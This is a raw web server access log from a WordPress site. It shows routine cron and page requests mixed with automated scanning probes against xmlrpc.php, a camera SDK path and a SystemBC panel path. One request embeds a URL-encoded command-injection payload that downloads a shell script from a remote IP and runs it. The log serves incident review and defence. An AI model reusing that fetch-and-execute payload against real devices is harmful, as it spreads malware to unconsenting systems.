36.133.115.36 - - [04/Jan/2026:04:44:21 +0800] "POST /wp-cron.php?doing_wp_cron=1767473061.5425500869750976562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
38.46.221.123 - - [04/Jan/2026:04:44:21 +0800] "GET http://check.9tb.org/ HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
38.46.221.123 - - [04/Jan/2026:04:44:22 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 34110 "http://check.9tb.org" "Go-http-client/1.1"
43.133.187.11 - - [04/Jan/2026:04:46:18 +0800] "GET /wp-content/uploads/2025/09/1756868614-20250903104654_74_5-768x346.webp HTTP/1.1" 200 43274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Jan/2026:04:47:25 +0800] "POST /wp-cron.php?doing_wp_cron=1767473245.3205080032348632812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
182.42.104.32 - - [04/Jan/2026:04:47:25 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
182.42.104.32 - - [04/Jan/2026:04:47:27 +0800] "GET / HTTP/1.1" 200 33677 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Jan/2026:05:04:52 +0800] "POST /wp-cron.php?doing_wp_cron=1767474292.4023640155792236328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.214 - - [04/Jan/2026:05:04:52 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Jan/2026:05:11:04 +0800] "POST /wp-cron.php?doing_wp_cron=1767474664.4258980751037597656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
194.60.201.96 - - [04/Jan/2026:05:11:04 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
36.133.108.119 - - [04/Jan/2026:05:24:50 +0800] "HEAD /systembc/password.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/24.0.1292.0 Safari/537.14"
36.133.115.36 - - [04/Jan/2026:05:26:03 +0800] "POST /wp-cron.php?doing_wp_cron=1767475563.7516009807586669921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
130.12.180.18 - - [04/Jan/2026:05:26:03 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F130.12.180.20:36695%2Fcat.sh%20-O-%20%7C%20sh%3B%20curl%20-O%20http%3A%2F%2F130.12.180.20:36695%2Fcat.sh%3B%20chmod%20777%20cat.sh%3B%20sh%20cat.sh HTTP/1.1" 404 8975 "-" "Mozila/5.0"
118.120.181.220 - - [04/Jan/2026:05:28:23 +0800] "GET / HTTP/1.1" 200 34110 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70"
36.133.115.36 - - [04/Jan/2026:05:28:53 +0800] "POST /wp-cron.php?doing_wp_cron=1767475733.4648160934448242187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
